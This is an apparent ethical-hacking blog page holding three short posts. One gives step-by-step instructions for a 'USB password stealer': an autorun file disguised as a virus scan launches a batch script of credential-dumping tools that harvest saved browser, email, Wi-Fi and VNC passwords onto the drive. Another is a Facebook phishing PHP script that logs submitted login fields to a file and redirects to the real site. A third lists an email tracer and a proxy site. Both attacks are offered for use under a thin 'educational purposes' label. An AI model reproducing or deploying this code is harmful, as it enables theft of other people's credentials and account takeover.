page content 2014 ~ Ethical Hacking & CEH Training In Patna

ranjanraja.blogspot.in

My official blog

ranjanraja.blogspot.in

My official blog

ranjanraja.blogspot.in

My official blog

ranjanraja.blogspot.in

My official blog

ranjanraja.blogspot.in

My official blog

25.10.14

USB PASSWORD STEALER

ONLY FOR EDUCATIONAL PURPOSES :-


  1.  open notepad /  wordpad

    type:

    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan

    save this as AUTORUN.inf

  2. open a new notepad/wordpad document

    type:

    start mspass.exe /stext mspass.txt

    start mailpv.exe /stext mailpv.txt

    start iepv.exe /stext iepv.txt

    start pspv.exe /stext pspv.txt

    start PasswordFox.exe /stext passwordfox.txt

    start OperaPassView.exe /stext OperaPassView.txt

    start ChromePass.exe /stext ChromePass.txt

    start Dialupass.exe /stext Dialupass.txt

    start netpass.exe /stext netpass.txt

    start WirelessKeyView.exe /stext WirelessKeyView.txt

    start BulletsPassView.exe /stext BulletsPassView.txt

    start VNCPassView.exe /stext VNCPassView.txt

    start OpenedFilesView.exe /stext OpenedFilesView.txt

    start ProduKey.exe /stext ProduKey.txt

    start USBDeview.exe /stext USBDeview.txt


    save this as LAUNCH.bat
  3. copy the autorun and launch file to your USB
  4. go to http://www.nirsoft.net/ and download the programs named in step 2
  5. extract the files you downloaded to your desktop and copy all the .exe files to your USB
  6. remove and re-insert your USB
  7. click on the option perform a virus scan
    (this is an exemple, if you want it to say something else go to the autorun file and change it ;) )
  8. go to my computer---> USB DRIVE and open it


    you will now see some text files, if you open them you will see usernames and passwords


    NOTICE: this only recovers passwords that have once been saved on your computer

18.4.14

email/ip tracer

http://www.ip-tracker.org/find/email-finder.php#email_headers

proxy related sites

http://samair.ru/

11.3.14

Facebook phising script updated 2015

Just copy the below script in notepad and save it as anyname.php

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Twitter Delicious Facebook Digg Stumbleupon Favorites More